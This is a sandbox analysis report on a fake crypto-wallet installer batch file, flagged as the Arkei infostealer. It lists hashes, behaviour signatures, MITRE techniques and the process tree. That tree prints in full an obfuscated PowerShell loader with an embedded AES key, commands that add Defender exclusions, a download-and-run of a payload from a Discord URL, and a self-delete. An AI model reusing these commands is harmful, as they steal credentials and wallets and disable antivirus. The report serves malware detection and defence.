Overview

overview

10

Static

static

AtomicWall...up.bat

windows7-x64

8

AtomicWall...up.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    91s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-08-2022 15:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AtomicWallet_Setup.bat

  • Size

    22KB

  • MD5

    3004914cdfa67357410e6f0c9a091655

  • SHA1

    dfdbb09661ee90ad4e88e7b0510653c93485a4b2

  • SHA256

    33d0d9fe89f0dba2b89347a0e2e6deb22542476d98676187f8c1eb529cb3997f

  • SHA512

    8f03d8c5a99dc85500e81ca613453ae886050f7e8303b39f6bc83f18db9e20596a743049d24f663c9c0ffd357b013480f6bc997deece1d15def3486429f3f49e

Score
10/10
arkeidefaultdiscoveryevasionspywarestealer

Malware Config

Extracted

Family

arkei

Botnet

Default

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4336
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat' -ArgumentList 'am_admin'"
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1316
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4992
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo F"
          4⤵
            PID:3216
          • C:\Windows\system32\xcopy.exe
            xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe AtomicWallet_Setup.bat.exe /y
            4⤵
              PID:2640
            • C:\Windows\system32\attrib.exe
              attrib +s +h AtomicWallet_Setup.bat.exe
              4⤵
              • Sets file to hidden
              • Views/modifies file attributes
              PID:5036
            • C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat.exe
              AtomicWallet_Setup.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $OnVrQh = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat').Split([Environment]::NewLine);$aWPbUn = $OnVrQh[$OnVrQh.Length - 1];$miePxL = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgSU9YVHZZIHsgcHVibGljIHN0YXRpYyBieXRlW10gWVpueldIKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gTVJtbUdtKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9'));Add-Type -TypeDefinition $miePxL;[System.Reflection.Assembly]::Load([IOXTvY]::MRmmGm([IOXTvY]::YZnzWH([System.Convert]::FromBase64String($aWPbUn), [System.Convert]::FromBase64String('E4IVXfYvoAH9YDlDQGzejd4/Zom8IPGT2Myddj/Bu10='), [System.Convert]::FromBase64String('4HVdg8diwSyYUE5hdNkHOA==')))).EntryPoint.Invoke($null, (, [string[]] ('am_admin')))
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:344
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\if3sl1wm\if3sl1wm.cmdline"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3576
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB4ED.tmp" "c:\Users\Admin\AppData\Local\Temp\if3sl1wm\CSC7CF57D626D0F4C229F467F5EA59C75A.TMP"
                  6⤵
                    PID:4460
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" Add-MpPreference -ExclusionPath C:\ -ExclusionExtension exe ; Add-MpPreference -ExclusionPath C:\ -ExclusionExtension exe ; @('https://cdn.discordapp.com/attachments/867102519430610964/999703636240236564/statistics.exe') | foreach{$fileName = $env:LOCALAPPDATA + '/statistics.exe' ;(New-Object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName}
                  5⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:932
                  • C:\Users\Admin\AppData\Local\statistics.exe
                    "C:\Users\Admin\AppData\Local\statistics.exe"
                    6⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    • Loads dropped DLL
                    • Checks processor information in registry
                    • Suspicious use of WriteProcessMemory
                    PID:1448
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\statistics.exe" & exit
                      7⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2400
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 5
                        8⤵
                        • Delays execution with timeout.exe
                        PID:2016
              • C:\Windows\system32\attrib.exe
                attrib -s -h AtomicWallet_Setup.bat.exe
                4⤵
                • Views/modifies file attributes
                PID:3684

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Hidden Files and Directories

        2
        T1158

        Privilege Escalation

        Defense Evasion

        Hidden Files and Directories

        2
        T1158

        Credential Access

        Credentials in Files

        2
        T1081

        Discovery

        Query Registry

        3
        T1012

        System Information Discovery

        3
        T1082

        Lateral Movement

        Collection

        Data from Local System

        2
        T1005

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\mozglue.dll
          Filesize

          133KB

          MD5

          8f73c08a9660691143661bf7332c3c27

          SHA1

          37fa65dd737c50fda710fdbde89e51374d0c204a

          SHA256

          3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

          SHA512

          0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

          Download Submit
        • C:\ProgramData\nss3.dll
          Filesize

          1.2MB

          MD5

          bfac4e3c5908856ba17d41edcd455a51

          SHA1

          8eec7e888767aa9e4cca8ff246eb2aacb9170428

          SHA256

          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

          SHA512

          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          6cf293cb4d80be23433eecf74ddb5503

          SHA1

          24fe4752df102c2ef492954d6b046cb5512ad408

          SHA256

          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

          SHA512

          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          feadc4e1a70c13480ef147aca0c47bc0

          SHA1

          d7a5084c93842a290b24dacec0cd3904c2266819

          SHA256

          5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac

          SHA512

          c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          63e62e02ee9c90b7adfb2eefe7efa04f

          SHA1

          9bc1eda86f7f95345c2a3901288b6867447dee6b

          SHA256

          cbafbcef08446541d49da9d11842ab860628a7d317db15f570b7b1e1048ade11

          SHA512

          3d2bf16c2a9b42e28dc9d2c18d6d697d3749b14f2f6c708ea9e587022aeb5fbbcffaa49c4f4f994f1cd1f6c886b8d8b6ab3a29d3b65fe0659ea0f2fa9d47ba52

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat.exe
          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat.exe
          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\RESB4ED.tmp
          Filesize

          1KB

          MD5

          0195578dd9a7f3018831deb1117c218a

          SHA1

          019bccfa0c8a04b9ca726f1cde1fbead52f969d4

          SHA256

          27cfd76d11e4a70d8e66a5264ba21f7c02aed8bee060c362f2e019a5a8904b47

          SHA512

          c7256a1ef479a15042d7f228d9ad0366fe357c0bfc4d8c9d7b5a53f4fac601f1960a3e6b698f80b519d5a1a5c6642c4d06d63f37e0d83db98da0fc21543a458b

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\if3sl1wm\if3sl1wm.dll
          Filesize

          3KB

          MD5

          193a73093f861355e735c9f49c034c46

          SHA1

          c3b599f494abe99996b8bce47046fb579e738315

          SHA256

          3f846f02a9baacc71c06e1789dbf2a05de4c9fcf26a0238d02a0974ebcef8a1d

          SHA512

          938adc135ab48591bb895b0e668e6ff1a8cd2cbc711acc64f4a3174d7174cdfa15594ae6e5bb2f2104796d9d04ff3164f79f4616d7e422a74e7e57ae8e97a5ad

          Download Submit
        • C:\Users\Admin\AppData\Local\statistics.exe
          Filesize

          171KB

          MD5

          10f0d3a64949a6e15a9c389059a8f379

          SHA1

          0f6e3442c67d6688fae5f51b4f60b78cd05f30df

          SHA256

          10afe233525aaf99064e4e444f11a8fc01f8b9f508e4f123fd76b314a6d360f9

          SHA512

          40b19007433518aba9c19c9fdae314112a73f50ab0dcf9356a1887b44bcdbadf767be1eb0f2d4c1ba249c8791473c55e0d9f12daaed9356bf560e14d3e473c60

          Download Submit
        • C:\Users\Admin\AppData\Local\statistics.exe
          Filesize

          171KB

          MD5

          10f0d3a64949a6e15a9c389059a8f379

          SHA1

          0f6e3442c67d6688fae5f51b4f60b78cd05f30df

          SHA256

          10afe233525aaf99064e4e444f11a8fc01f8b9f508e4f123fd76b314a6d360f9

          SHA512

          40b19007433518aba9c19c9fdae314112a73f50ab0dcf9356a1887b44bcdbadf767be1eb0f2d4c1ba249c8791473c55e0d9f12daaed9356bf560e14d3e473c60

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\if3sl1wm\CSC7CF57D626D0F4C229F467F5EA59C75A.TMP
          Filesize

          652B

          MD5

          17d995e7a49f7703b08a5ec778272d36

          SHA1

          12f1815fc006ddeff36433dd9e186451d4b6a459

          SHA256

          91b23f3b221051fe2346653d0e094748039ba5cb0323bc1110c8d9db792e23ab

          SHA512

          1bb320204ce60ff684e0dbaf9d8a3acf964a3359e6bf77e14e2098cffd226eb6f78d7c9f2383fd127aeb5e73e164ee04f9a79efdd0ac80a2b262090bcf49fef8

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\if3sl1wm\if3sl1wm.0.cs
          Filesize

          744B

          MD5

          bc20fac1e1fa70c99931d73d89bd8a1f

          SHA1

          a7dd841b94caba28af0e5830378a7d758c69f82a

          SHA256

          ed91afd747b746d00d3932267f84a1f799d64b30702042b1e57fe878cb9ca41f

          SHA512

          6b5adf551d8f4dc7cb7f91fca03d519da4f82914de8ad6215c9ac0d721c7e37092d276755d8802f9768f7ece09dcf36e1bacf8a20c602423a39a3aafd19ab3ac

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\if3sl1wm\if3sl1wm.cmdline
          Filesize

          369B

          MD5

          8b943e08074168228f94866126defba9

          SHA1

          caef11a4dc31c1fc63169af4ab15ef1a7550f750

          SHA256

          65ebd5d9363e729b7da9f8e651dbf80a9f85295db6b4a776080d967f4bc5f492

          SHA512

          c948db11e0b7ec97d1256d36bc1979cf706223e70e1ad5a7631f0b8183a529e50fe97775af6d37a3efde3748ee007247d1cc8205ab2c3dd1e06b3762e12fdeda

          Download Submit
        • memory/344-152-0x00007FF87DB80000-0x00007FF87E641000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/344-145-0x00007FF87DB80000-0x00007FF87E641000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/344-139-0x0000000000000000-mapping.dmp
          Download
        • memory/932-159-0x00007FF87DB80000-0x00007FF87E641000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/932-150-0x0000000000000000-mapping.dmp
          Download
        • memory/932-153-0x00007FF87DB80000-0x00007FF87E641000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1316-130-0x0000000000000000-mapping.dmp
          Download
        • memory/1316-131-0x0000017E9B780000-0x0000017E9B7A2000-memory.dmp
          Filesize

          136KB

          Download
        • memory/1316-132-0x00007FF87DB80000-0x00007FF87E641000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1316-134-0x00007FF87DB80000-0x00007FF87E641000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1448-160-0x0000000000400000-0x000000000043D000-memory.dmp
          Filesize

          244KB

          Download
        • memory/1448-156-0x0000000000000000-mapping.dmp
          Download
        • memory/1448-161-0x0000000060900000-0x0000000060992000-memory.dmp
          Filesize

          584KB

          Download
        • memory/1448-183-0x0000000000400000-0x000000000043D000-memory.dmp
          Filesize

          244KB

          Download
        • memory/2016-184-0x0000000000000000-mapping.dmp
          Download
        • memory/2400-182-0x0000000000000000-mapping.dmp
          Download
        • memory/2640-136-0x0000000000000000-mapping.dmp
          Download
        • memory/3216-135-0x0000000000000000-mapping.dmp
          Download
        • memory/3576-142-0x0000000000000000-mapping.dmp
          Download
        • memory/3684-155-0x0000000000000000-mapping.dmp
          Download
        • memory/4460-146-0x0000000000000000-mapping.dmp
          Download
        • memory/4992-133-0x0000000000000000-mapping.dmp
          Download
        • memory/5036-137-0x0000000000000000-mapping.dmp
          Download